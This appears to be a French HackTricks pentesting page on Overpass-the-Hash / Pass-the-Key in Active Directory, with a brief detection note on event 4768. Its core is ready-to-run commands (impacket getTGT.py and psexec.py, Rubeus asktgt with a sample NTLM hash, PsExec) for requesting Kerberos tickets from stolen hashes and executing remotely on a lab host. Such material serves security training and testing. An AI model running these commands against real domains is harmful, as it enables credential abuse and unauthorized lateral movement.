hacktricks/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.md
2023-06-03 13:10:46 +00:00

4 KiB
Raw Blame History

Overpasser le Hash/Passer la Clé (PTK)

Cette attaque vise à utiliser le hash NTLM ou les clés AES de l'utilisateur pour demander des tickets Kerberos, en alternative à la méthode courante Pass The Hash sur le protocole NTLM. Par conséquent, cela pourrait être particulièrement utile dans les réseaux où le protocole NTLM est désactivé et où seul Kerberos est autorisé en tant que protocole d'authentification.

Pour effectuer cette attaque, le hash NTLM (ou le mot de passe) du compte utilisateur cible est nécessaire. Ainsi, une fois qu'un hash utilisateur est obtenu, un TGT peut être demandé pour ce compte. Enfin, il est possible d'accéder à n'importe quel service ou machine où le compte utilisateur a des autorisations.

python getTGT.py jurassic.park/velociraptor -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7
export KRB5CCNAME=/root/impacket-examples/velociraptor.ccache
python psexec.py jurassic.park/velociraptor@labwws02.jurassic.park -k -no-pass

Vous pouvez spécifier -aesKey [clé AES] pour spécifier l'utilisation de AES256.
Vous pouvez également utiliser le ticket avec d'autres outils tels que : smbexec.py ou wmiexec.py

Problèmes possibles :

  • PyAsn1Error(NamedTypes can cast only scalar values,) : Résolu en mettant à jour impacket vers la dernière version.
  • KDC cant found the name : Résolu en utilisant le nom d'hôte au lieu de l'adresse IP, car elle n'était pas reconnue par Kerberos KDC.
.\Rubeus.exe asktgt /domain:jurassic.park /user:velociraptor /rc4:2a3de7fe356ee524cc9f3d579f2e0aa7 /ptt
.\PsExec.exe -accepteula \\labwws02.jurassic.park cmd

Ce type d'attaque est similaire à Pass the Key, mais au lieu d'utiliser des hachages pour demander un ticket, le ticket lui-même est volé et utilisé pour s'authentifier en tant que propriétaire.

{% hint style="warning" %} Lorsqu'un TGT est demandé, l'événement 4768: A Kerberos authentication ticket (TGT) was requested est généré. Vous pouvez voir dans la sortie ci-dessus que le type de clé est RC4-HMAC (0x17), mais le type par défaut pour Windows est maintenant AES256 (0x12). {% endhint %}

.\Rubeus.exe asktgt /user:<USERNAME> /domain:<DOMAIN> /aes256:HASH /nowrap /opsec

Références

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥